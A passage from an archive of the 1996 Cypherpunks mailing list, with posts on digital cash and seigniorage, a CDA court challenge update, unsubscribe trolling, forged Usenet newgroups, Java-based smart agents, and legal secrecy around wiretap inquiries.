maybe more secure someday), then money would tend to stay on the net.
That's when I figure we'll have actual e$-currency. On the other hand, one
of the best deterrents against someone cracking or stealing the bank's key
is to "expire" your currency issues, so there might be some "rolling over"
of the the money on the net, expecially if it's anonymous. Just like they
traded in worn-out bills in the old days.

Hmmm. As usual, I seem to be loosing my wiggle room here. Welcome to
quibble-punks. ;-). (Me! Not you, Hal!)

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "FRank O. Trotter, III" <fotiii@crl.com>
Date: Thu, 4 Apr 1996 18:47:21 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199604040402.AA10457@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Tue, 2 Apr 1996 08:11:21 -0800
> From:          Hal <hfinney@shell.portal.com>
> To:            cypherpunks@toad.com
> Subject:       Re: What backs up digital money?

> From: "Frank O. Trotter, III" <fotiii@crl.com>
> > Ecash is a means of transferring value, currently USD at Mark Twain,
> > betweeen parties.  Ecash, however denominated, is not a currency in
> > itself.
> 
> I am curious to know why you say that ecash is not a currency.  One of
> the main points of my original posting was to challenge this view.
> 
> Do you simply mean that this is a matter of definitions, that ecash isn't
> a currency because it lacks some property X that, by definition, a
> currency must have (such as, it must be issued by a national government)?


=====

I think I tried to cover too many bases at once.  Ecash _is_ currency, 
it is not _a_ currency.

This means that outside of the formal definition acording to BSA which 
says that currency is the stuff we carry around and nothing else, that 
ecash generated coins function as a currency in that one can make purchases 
on a peer to peer basis, and appears to have the migration path 
necessary to exist in an offline world as well.  To me this makes it 
currency.

It is not a currency.  One sees many articles and posts (not yours) that 
refer to ecash as though it were not USD or some other store of value. 
In this case I mean that ecash is the software that moves and stores 
money like a check, or more precisely like a money order, but is not 
in itself _a_ currency.

> 
> Or are you saying that there is an important functional difference, that
> ecash cannot be used as we normally use currency (that is, the dollar
> bills and coins in our pockets) because of reason X?  If so I would like
> to hear what you think that reason is.  The one I have seen mentioned
> previously is transferrability, so I discussed this in my original
> message.
> 
> > The value unit or currency has value because people agree it has
> > value.  CyberBucks were (and still are) somewhat convertable to
> > tangible goods - they are for sure convertable to intrinsic goods as
> > demonstrated by the CyberBucks trial.  USD and DEM have value only
> > because we all accept them as payment - as fiat currencies there is no
> > formal backing.  Gold has value because ...
> 
> The whole issue of why dollars have value is one which is poorly
> understood, IMO.  There are several reasons, which are inter-related.
> One of the big ones is that they are legal tender.  This term does not
> mean what a lot of people think it does, but at least it means that
> your dollars carry certain legal weight if you have a debt that you
> need to pay off.  Another reason dollars are accepted is because you
> know you can pay your taxes with them.  This is something that most
> people have to do, and dollars are something they can do it with.
> 
> Another factor is that there are long term contracts, such as
> mortgages, which are denominated in dollars.  You can use your dollars
> to pay off your debt at the bank, and the bank is contractually bound
> to accept them (even apart from legal tender considerations), and grant
> you title to tangible property in return.  Interestingly, the volume of
> outstanding mortgages is of the same order of magnitude as the
> circulating money supply.  I know someone who claims that this is the
> most important factor in giving dollars value.
> 
> And finally, the reason that most people think of, the fact that
> everyone around them accepts dollars, and presumably will do so in the
> future.  I don't actually think this is as strong as the others, since
> there is no guarantee that people won't change their minds, and in fact
> there have been historical situations where due to hyper inflation
> merchants have come to view government money as almost worthless.  So
> since these people haven't committed to accept the money, this
> grounding is not that strong.  I think the earlier examples are more
> important as an ultimate grounding, although they are not cited as
> frequently.

Exactly - I agree.  Take a look at contracts like loans until 
Roosevelt closed the gold window in the early thirties.  They said 
things like "you owe $100 or the equivalent of X.xx ounces of gold.  
With the revaluation of the US currency in terms of gold in the 30s 
there was a specific potion of the bill that disallowed these terms 
in contracts since the devaluation could not effectively take place 
otherwise (ref - Jim Grant).

> 
> > Ecash puts banks back into the business of being banks - acting as a
> > storehouse of value, and as a means to transfer this value, all for a
> > fee.  The early bank models were exclusively along these lines, with
> > the various lending and investing functions added later.
> 
> I would expect that an ecash issuing bank would make ecash loans just as
> it makes other forms of loans.  So I don't see ecash as making this
> kind of difference in a bank.  Just because a bank issues ecash it's
> not going to roll back the clock to the 18th century.

No quarrel here - but I think it is easier to build a competing 
lending institution where the business gives you money and you 
promise toi give it back, than it is to build confidence in a deposit 
institution where you give money and hope to get it back.  I take my 
original commnet as a positive.

> 
> One of the big advantages of multiple ecash currencies is that it turns
> out that there is automatic control of inflation.  A bank which issues
> too much currency (relative to its reserves) will find it becoming worth
> less because it is trusted less.  There is an automatic balancing act.
> 
Sure, this is like free banking in the 1800 - Fed KC traded at a discount to 
Fed NY or vice versa depending on attitude at the time.

> We see the same thing in the international currency markets with
> government currencies.  In the olden days, when international trade was
> less important, a government could inflate without feeling much pain.
> But today its currency will lose value, which will hurt its balance of
> trade and make it hard to acquire foreign goods.  So this puts a brake on
> the ability of governments to play games with the money supply.  The same
> factor would be expected to occur with private currencies.

In the old days there was an automatic balance when a government 
inflated - the metal standard attached.  If inflation got out of hand 
people would show up at the window with bills asking for the gold or 
silver equivalent - when the government gave out too much metal it 
had to behave.

I would like to note that I am a big supported of private currencies. 
 We have had many discussions on the topic and I have had the 
academic side covered by folks who wrote papers as far back as the 
50s on how to do it.  As ecash is accepted in the mainstream by 
multi-issuing interoperable banks I expect to spend more time on this 
topic - for now I need to get  on with the conventional version.

Great ideas!


Frank

> 
> Hal
> 
> 
Frank O. Trotter, III  -   fotiii@crl.com
www.marktwain.com  - Fax: +1 314 569-4906
--------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Apr 1996 21:58:06 +0800
To: Batman <cypherpunks@toad.com>
Subject: "unsubscrive" again!
Message-ID: <ad88923e0e021004e928@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 AM 4/4/96, Batman wrote:
>unsubscrive * batman@internet.infomaniak.ch
>unsubscrive * batman@ns.infomaniak.ch
>unsubscrive * batman@mail.infomaniak.ch

Yet another "unsubscrive"? Is this some weird alternate spelling? Or are we
being trolled?

Apparently Batman has not been reading any of the recent posts on this
subject--which is not surprising, for correlative reasons--so I doubt he'll
even read this message.

But in the hopes that he comes out of his Batcave long enough to fire up
his Batcomputer:

How to subscribe to the Cypherpunks mailing list: send a message to
"majordomo@toad.com" with the body message "subscribe cypherpunks". To
unsubscribe, send the message "unsubscribe cypherpunks" to the same
address. For help, send "help cypherpunks".  Don't send these requests to
the Cypherpunks list itself. And be aware that the list generates between
40 and 100 messages a day.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 4 Apr 1996 20:13:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199604040730.XAA21490@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 AM 3/29/96 -0800, Jim Bell wrote:
>At 05:49 AM 3/29/96 -0500, Black Unicorn wrote:
>>I thought I would take the time to let everyone know that this is 
>>baseless as well.  Most jurisdictions forbid third parties to reveal 
>>prosecution inquries to the principal for which they are holding 
>>documents or other information.  A VERY few have laws on the books that 
>>require this disclosure.  Switzerland is no longer one of them.
>
>As usual, Unicorn is FOS.  Not entirely in his facts, but in his 
>conclusions.  To "forbit third parties to reveal prosecution inquiries" is 
>an obvious violation of freedom of speech, and in fact is PRIOR RESTRAINT.  
>Maybe Unicorn can't see what's wrong with that, but I can.  It is unclear 
>whether this has ever been tested in court, or whether that test occurred 
>recently.

Black Unicorn is absolutely correct that this is generally the law.
Jim Bell is absolutely correct that laws like this are offensive and outrageous.
Unfortunately, Jim then rants at Unicorn for suggesting that this
would be the case; you'd think he'd be the first to realize that
there are laws out there that are offensive and outrageous and enforced.

>For example, if I ask my ISP to send me an anonymous, encrypted message with 
>the word, "Rosebud" in it to me if he receives any requests to tap my 
>connection, he can do so with no fear of being discovered, because no third 
>party can decrypt the message, know who is is from, or know the real meaning 
>of the word, "Rosebud" in the context of an encrypted, anonymized message.  
>Further, since the whole thing is by pre-arrangement, even I cannot prove 
>(to the satisfaction of a third party) that the message really meant what I 
>would interpret it to mean.  The message is useful to me, as a warning, but 
>it could never turn around and "bite" the ISP.

Now that's an interesting wrinkle to the problem.  I suspect that,
as you suggest, there will be ISPs, especially in non-US jurisdictions,
that are willing to send out "Rosebud" messages to anonymous remailers,
or to fail to send "Remarque" messages, or to debit anonymous accounts
for data retrieval services rendered while also supporting billing-status
checking by anonymous remailers.  From a crypto-anarchist dogmatic perspective,
it'll definitely happen, though there may be a rough transition until
there's enough critical mass to make it undetectable (and note that
"undetectable" is a tougher standard than "untraceable"...)


# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 fax-2527
#
# Spam.  It's what's for dinner.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 4 Apr 1996 20:09:01 +0800
To: cypherpunks@toad.com
Subject: FC: CDA Court Challenge: Update #4
Message-ID: <AlMpnsa00YUv1kCG9X@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




-----------------------------------------------------------------------------
                           The CDA Challenge, Update #4
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

April 3, 1996


NEW YORK -- This afternoon the action shifted to a Manhattan
courtroom, where a panel of Federal judges tried to decide what to do
with a CDA challenge filed after ours.

The lone plaintiff is Joe Shea, who declined to join the ACLU/ALA
coalition lawsuit and is suing on behalf of the American Reporter.
Shea has been pressing the NYC court to rule on his case before ours
is decided.

While we've taken pains to net.educate our judges with live -- albeit
buggy -- demos and six days of hearings, Shea is relying on hardcopy
to argue his case. This strategy is dangerous: if a relatively
ill-educated NYC court upholds the CDA, that precedent can hurt our
case.

In court today, U.S. Second Circuit Court of Appeals Judge Cabranes
proposed that Shea and the assistant U.S. Attorney defending the CDA
adopt the record of the Philadelphia case to avoid duplication of
evidence, testimony, and exhibits. Shea's attorney, Randall Boe, was
reluctant to agree, even though he would be allowed to present
additional evidence. (The DoJ's crack civil team declined to show
today.)

The court wasn't happy with Boe's response. It gave Shea and the
government until April 17 to decide to include the entire record of
the Philly lawsuit -- and said that if they don't, the court would
appoint its *own* computer expert to demo the Net and blocking
software on April 30.

Another possibility is that the New York court could stay its decision
until the Philly court issues its opinion. At the request of the
Pennsylvania three-judge panel, Marjorie Heins from the ACLU was in
NYC today to describe the latest in our case; she also suggested that
the Judge Cabranes' court had the option to wait. This could happen --
my friend Eric Freedman of Hofstra Law School tells me it is by no
means unusual for one Federal court to defer to parallel proceedings
in another.

No matter what the panels of judges decide, the two cases will be
consolidated on appeal to the Supreme Court. (If we lose, we have 60
to 90 days to file our appeal. If the DoJ loses, they have 20 to 30
days to file theirs.)

Bruce Taylor has a unique perspective on the hearings. He's the guy
who helped *write* the be-damned CDA and he's been its most vocal
supporter over the last year as president of the National Law Center
for Children and Families. I met Taylor last week at the Computers,
Freedom, and Privacy conference and we sucked down a few beers in the
hotel bar before he went cue-to-cue with Brock Meeks.

Taylor told me today that the assistant US atty for the Southern
District of New York was "just parroting what's happening in
Philadelphia" and had come down from NYC on Monday to observe the
proceedings.

A former porn-prosecutor, Taylor wears his successful convictions as a
badge of honor: "Comstock was an amateur!" He says his side is doing
well: "I've worked with the civil division before... They're very good
litigators who do their homework." (Of course, Taylor conveniently has
deluded himself into believing the CDA is constitutional.)

Today we also officially learned the identities of the DoJ's two
expert witnesses.

Since the DoJ is calling only two witnesses and we're calling just one
more, we should finish before April 26. (The DoJ's fax to our legal
team today says: "At this point, defendants do not plan to call
additional witnesses.") If this works out, we'll complete testimony on
April 12 and reserve April 15 for rebuttal.

As I reported in a previous dispatch, the first pro-CDA witness is Dan
R. Olsen, Jr., the incoming director of the Human Computer Interaction
Institute at Carnegie Mellon University. Currently the head of the
computer science department at Brigham Young University, Olsen will
testify about the "technical issues related to the 'safe harbor'
defenses" under the CDA. Olsen will be deposed, probably in
Washington, DC, on April 8.

Olsen was unwilling to tell me much in email earlier today:
  "I understand your interest, having read your home page. I would be
   happy to go over all of this with you when I actually move to CMU
   in July and the case has completed. Until the case is resolved, it
   would be inappropriate to discuss it. Thanks for your interest."

Note that BYU's rather Orwellian computer usage policies say:
  "DON'T: Use BYU resources to view or transmit pornography... All the
   activities and circumstances covered by this policy must comply with
   the University's standards of Christian living... The University
   community may direct questions or requests for exceptions to this
   policy, as well as report any instances of noncompliance or
   deviations to the Advancement Vice President."

How appropriate that a faculty member at such a school would take a
job as an administrator at equally-censorhappy Carnegie Mellon
University -- which is considering a truly heinous speech code and
still censors its USENET feed!

I predict lots of cybersmut when the second government witness
testifies. He's Special Agent Howard A. Schmidt from the Air Force
Office of Special Investigations, and will "present a demonstration
and testify concerning access to information, including sexually
explicit material, that is available online, including through the
Internet." Schmidt will be deposed on April 9.

Brock Meeks reports that Schmidt apparently is a member of the High
Technology Crime Investigation Association and has participated in a
"Law Enforcement Panel on Computer Forensics" for the 18th National
Information Systems Security Conference in Baltimore last October. He
also likes boats and fishing; hiking and camping.

It's a cinch that the April 12 hearing will be the best-attended. How
often do you get a chance to see a DoD Special Agent pull up smutty
GIFs on dual 8' projection screens in a Federal courtroom?

The question is, of course, which GIFs? On the WELL, folks are betting
that the salacious collection will include at least one snapshot of
female genitals nailed to a table. At least, that the image that Bruce
Taylor delights in using as an example of cybernastiness.

Still no word on the true identity of Grey Flannel Suit.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court on 4/12, 4/15, and possibly 4/26.

Mentioned in this CDA update:
  The American Reporter   <http://www.newshare.com/Reporter/today.html>
  Joe Shea                <joeshea@netcom.com>
  DoD's Howard Schmidt    <howardas@aol.com>
  MU's HCI Institute      <http://www.cs.cmu.edu/~hcii/>
  Dan Olsen at BYU        <http://www.cs.byu.edu/info/drolsen.html>
  BYU's censorship policy <http://advance.byu.edu/pc/releases/guidelines.html>
  Censorship at CMU       <http://joc.mit.edu/>
  Brock Meeks on Howard Schmidt:
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2039>
  Brock Meeks' CyberWire Dispatch on Bruce Taylor:
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2040>
  Joe Shea's complaints about ACLU wanting to "stand alone in the limelight":
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2014>
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2036>
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2037>

This and previous CDA Updates are available at:
  <http://fight-censorship.dementia.org/top/>
  <http://www.epic.org/free_speech/censorship/lawsuit/>

To subscribe to the fight-censorship mailing list for future CDA Updates and
similar discussions, send "subscribe" in the body of a message addressed to:
  fight-censorship-request@andrew.cmu.edu
 
Other relevant web sites:
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>

-----------------------------------------------------------------------------
      (This CDA Update was compiled from various firsthand reports.)
-----------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 4 Apr 1996 23:32:54 +0800
To: kreidl@newrock.com
Subject: Re: Digest Version???????
Message-ID: <199604040831.AAA07991@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Typically the way to get a digested version of a cow is to kill and eat it...
Oh, wait, you probably mean the list.....

www.hks.net and nntp.hks.net let you read the Cypherpunks and Coderpunks
mailing lists with the Web and Newsreader programs (except when they're
down for repairs.)  The Web version is typically half a month behind
because it gets summarized and hypertextified monthly, though I suspect
the articles are there and it's just the index that's old.

If you're looking for a reduced-volume list filtered using human intelligence,
Eric Blossom <eb@comsec.com> does cypherpunks-light for $20/year,
and Ray Arachelian (sp?) does fcpunx for free, somewhere you can probably  
look up with AltaVista.

At 05:30 PM 4/3/96 -0600, you wrote:
>Anyone know if I can get a digest version of this???
>
>		(__)
>	 	(oo)
>	/--------\/
>       /  |     ||   <-- Moo.(We live in Wisconsin, the dairy state, get it?)
>      /  ||     ||
>      *  ||-----||
>         ~~     ~~  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 4 Apr 1996 21:16:34 +0800
To: cypherpunks@toad.com
Subject: Re: National id already here?
Message-ID: <199604040831.AAA08006@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:35 PM 4/3/96 -0800, Yap Remailer <remailer@yap.pactitle.com> wrote:
>http://www.aamva.net/AAMVAnet_New_Systems.html says:
>    Coman said [police] officers can use "CDLISCheck" to access commercial
>    driver license status, history and AKA information. She noted that
>    the new service was developed in response to a Congressional mandate
>    that requires access to commercial carrier and driver information by
>    at least 100 roadside sites by 1996 and at least 200 locations by 1997.
>
>There's a congressional mandate for nationwide online id???

There are a lot more regulations on interstate truckers than on most people;
it's somewhat within the Constitutional guidelines.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 4 Apr 1996 20:56:59 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "unsubscrive" again!
Message-ID: <199604040832.AAA08016@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 PM 4/3/96 -0800, Timothy C. May wrote:
>Yet another "unsubscrive"? Is this some weird alternate spelling? Or are we
>being trolled?

My gut feel is that it's a troll.  Don't know if it's a Medusa with tentacles
all over the world subscribing and asking to undescrive, or whether somebody's
been forging subscription requests and sending along bogus instructions
for getting off.  Sigh.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Batman <batman@infomaniak.ch>
Date: Thu, 4 Apr 1996 15:31:49 +0800
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BB21C1.ECEED360@ppp10.infomaniak.ch>
MIME-Version: 1.0
Content-Type: text/plain


unsubscrive * batman@internet.infomaniak.ch
unsubscrive * batman@ns.infomaniak.ch
unsubscrive * batman@mail.infomaniak.ch







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 4 Apr 1996 23:14:09 +0800
To: cypherpunks@toad.com
Subject: Fascinating troll with forged newgroups
Message-ID: <Pine.SUN.3.92.960404025711.4952A-100000@elaine13.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Looks like the Nazis forged newgroup messages for rec.fag-bashing,
rec.org.kkk, and 100 RFD'd groups in order to get their little messages
across.

How entertaining. What a marvelous new form of net.vandalism they've
discovered. Or is this not new?

The clearly forged Date: header and the cover newsgroups are pretty
transparent, if you ask me.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 4 Apr 1996 23:07:43 +0800
To: pcmag@zd.com
Subject: Rebuttal to Dvorak
Message-ID: <2.2.32.19960403215935.00686afc@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Letters to the Editor, PC Magazine

RE: April 23 issue

I found Mr. Dvorak's name-calling and finger-pointing sufficiently
inspirational that I have posted an editorial rebutting his April 23 column
on our Web server at

http://www.shellback.com/editorials.htm

(yes, the 'l' is missing at the end :-)

Permission is hereby granted to reprint and/or repost the article in total.

David Merriman
webmaster@shellback.com
Amarillo, TX
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 5 Apr 1996 01:20:27 +0800
To: cypherpunks@toad.com
Subject: Re: Digest Version???????
Message-ID: <v02120d05ad896c35ceb1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:32 AM 4/4/96, Bill Stewart wrote:

> If you're looking for a reduced-volume list filtered using human
>intelligence,
> Eric Blossom <eb@comsec.com> does cypherpunks-light for $20/year,
> and Ray Arachelian (sp?) does fcpunx for free, somewhere you can probably
>
> look up with AltaVista.

I also run e$pam, where I filter the e$-relevant stuff from cypherpunks and
about 50 (don't hold your breath, there isn't that much else out there,
yet) other sources. The total e$pam mail feed is about 30-50% (depends on
the day) of the cypherpunk total.

The e$ home-page is:

http://thumper.vmeng.com

e$pam is sponsored, so individual subscriptions are free.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 5 Apr 1996 04:10:08 +0800
To: cypherpunks@toad.com
Subject: Re: Fascinating troll with forged newgroups
In-Reply-To: <Pine.SUN.3.92.960404025711.4952A-100000@elaine13.Stanford.EDU>
Message-ID: <qo4uLD107w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> writes:

> Looks like the Nazis forged newgroup messages for rec.fag-bashing,
> rec.org.kkk, and 100 RFD'd groups in order to get their little messages
> across.
>
> How entertaining. What a marvelous new form of net.vandalism they've
> discovered. Or is this not new?
>
> The clearly forged Date: header and the cover newsgroups are pretty
> transparent, if you ask me.

If your co-dependents had forged tale's digital signatures, then this would be
interesting. But tale doesn't use digital signatures. Therefore forging him is
nothing new, nothing fascinating, has no cryptographic relevance, and probably
needn't be reported to the cypherpunks mailing list. I'm sure there are many
free-speech advocates on this list who find your attempts to silence the Nazis
_even _more distasteful then the Nazis' messages of hatred. A more appropriate
forum for your announcement might be news.admin.net-abuse.misc or news.groups.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 4 Apr 1996 15:48:48 +0800
To: cypherpunks@toad.com
Subject: Reminder. Suburbia BOAF Sat 6 April
Message-ID: <199604032330.JAA12922@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain



		 ____        _                _     _
		/ ___| _   _| |__  _   _ _ __| |__ (_) __ _
		\___ \| | | | '_ \| | | | '__| '_ \| |/ _` |
		 ___) | |_| | |_) | |_| | |  | |_) | | (_| |
		|____/ \__,_|_.__/ \__,_|_|  |_.__/|_|\__,_|
-------------------------------------------------------------------------------
			       Birds of a feather
			 ____            _         _ 
			|  _ \ __ _ _ __| |_ _   _| |
			| |_) / _` | '__| __| | | | |
			|  __/ (_| | |  | |_| |_| |_|
			|_|   \__,_|_|   \__|\__, (_)
					     |___/   

		    Saturday April 6, 1996 (easter weekend)
			    8:30pm till day light
			      boaf@suburbia.net
			     Melbourne Australia
	       (http://www.lonelyplanet.com/dest/aust/melb.htm)

This is a reminder. There are only three days left to RSVP. If you haven't
received the address yet, then you are not on the list. There is no door fee
(please see the original invite).

Ps. Despite the attention to detail, it will be a very laid back
    affair. DO NOT wear a tie. At least, not around your neck, or
    someone might attach it to the rafters. Despite the serious
    types during the day, we are fully BYO pillow.

---
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Bulero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Gleick <gleick@around.com>
Date: Fri, 5 Apr 1996 06:50:42 +0800
To: cypherpunks@toad.com
Subject: Re: e$ Signorage
Message-ID: <1.5.4b13.32.19960404143637.006a92b8@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


>I believe money which is never redeemed back at the bank is called
>signorage in the currency biz.  Whatever signorage *actually* is, Kawika
>Daquio of the ABA (B for "Banking"), the Fed makes $20 billion a year on
>it. Not much against a trillion dollar federal budget, but, hey, every
>little bit helps...

Seigniorage is actually the Government's interest income on all the currency in circulation. It's not obvious, but it's true, that the Fed collects the "float" on dollar bills you carry in your pocket, exactly as American Express collects the float on traveler's checks.

And, I don't know, call me crazy, but $20 billion sounds like a lot of money to me.


--
James Gleick
gleick@around.com
http://www.around.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matt@wdi.disney.com (Matthew Fuchs)
Date: Fri, 5 Apr 1996 17:32:41 +0800
To: ota+@transarc.com (Ted Anderson)
Subject: Re: java: vending machine software (long)
In-Reply-To: <QlMfpa2SMV0_1o3040@transarc.com>
Message-ID: <199604041741.JAA07928@scrumpox.rd.wdi.disney.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ted Anderson" <Ted_Anderson@transarc.com> writes:
> 
> "Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> > Java seems to be catching on in a big way (only a few months ago,
> 
> These are important ideas.  I found them explored very nicely
> in several papers written by Drexler and Miller (circa 1988!).  They
> are available in the collection "Ecology of Computation (1988)" and
> via the Agorics Home page (http://www.webcom.com/~agorics).
> 
> It seems that with the Web and Java now widely available the technical
> means to implement these ideas are getting visibly closer.
> 
Agorics is a company devoted to commercializing these ideas (Mark
Miller is one of the founders.  They're building a language for this
called Joule with some interesting properties.  Electric Communities
(http://www.communities.com), a "sister" company, has rolled a number
of these ideas into E, an extension of Java for safe, distributed
communications.  

> > when one thinks about this, I think it becomes clear that we are going
> > to see many, many new standards for code communication in the future.
> 
> The most interesting thing I've heard along these lines was described
> in a talk by Matthew Fuchs.   He suggested the idea of using something
> like SGML (of which HTML is a subset) to communicate between smart
> agents.  The idea is to provide a machine understandable equivalent
> of a web form which could be used to send info back and forth.  In
> this application display instructions are not important, what is
> important is the meaning assigned to the keywords.  For example, in
> a simple web page you might use <title>, <body>, <author>, <h1>, etc.
> The browser knows how display these because for simple documents they
> have a well defined meaning, but an automatic document indexer could
> also easily find the title and author.
> 
> Consider an airline reservation system.  It might support a variety of
> commands to answer queries and make reservations.  Clearly once the
> *meaning* is in hand, crafting a way to display it would be easy.  So
> you have a scheme which can be used with equal facility by
> either a human or a machine.  This allows for smooth transition from
> human mediated to automated steps in a larger project (e.g. plan a trip
> visiting these five cities) where some parts have been automated (e.g.
> airline reservations) and other parts have not (say, hotel reservations).
> 
> Further, the system can be built out of layers of objects that give
> meanings to various keywords.  Consider a bunch of keywords and
> associated Java applets that understand dates and times (they know about
> timezones and daylight savings and weekends and so forth).  Another
> level of objects knows how to manage schedules, and still another
> layer knows about travel arrangements.  The system used by a particular
> airline uses all these objects to provide an interface for communicating
> with customers (or their automated agents).
> 
> Java seems ideal suited to be the active lubricant in such a system.

This is a pretty good summation, without the slides.  What I'd add,
though is that I want the smart agents to be our WWW browsers (whose
intelligence I can extend either through local development or by
retrieving software over the Web).  I want the browser to be the
gateway integrating my local environment with the big world out there
and I want it defending my interests.  (I also want to get rid of the
word "browser" because it is too limited.)

If the Web is going to support social interactions and growth to a
zillion nodes, it has to move from a client/server architecture (good
for a browsing human) to a peer-to-peer architecture, like EDI, but
without requiring ISO or ANSI approval to do anything ('cause my agent
will do most of the browsing of the 100 potentially interesting sites
).  We need a "meta-standard" for creating and combining
domain-specific "mini-standards," and let the mini-standards battle it
out in the marketplace.  SGML and IDL are two potential
meta-standards.  Java provides a way to communicate base line
functionality the first time I see a new standard.

At the bottom of my home page are two recent paper submissions on
this.  The first ("Beyond the Write-Only Web") might be particularly
interesting to this group as it talks about how to make a
self-modifying malicious Java applet in the spirit of Ken Thompson's
Turing Award Lecture.

Matthew Fuchs
matt@wdi.disney.com
http://galt.cs.nyu.edu/students/fuchs
Mobile distributed objects, distributed coordination, and lots and
lots of languages




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Apr 1996 12:13:17 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u4tAl-00090wC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 PM 4/3/96 -0800, Bill Stewart wrote:

>>As usual, Unicorn is FOS.  Not entirely in his facts, but in his 
>>conclusions.  To "forbit third parties to reveal prosecution inquiries" is 
>>an obvious violation of freedom of speech, and in fact is PRIOR RESTRAINT.  
>>Maybe Unicorn can't see what's wrong with that, but I can.  It is unclear 
>>whether this has ever been tested in court, or whether that test occurred 
>>recently.
>
>Black Unicorn is absolutely correct that this is generally the law.
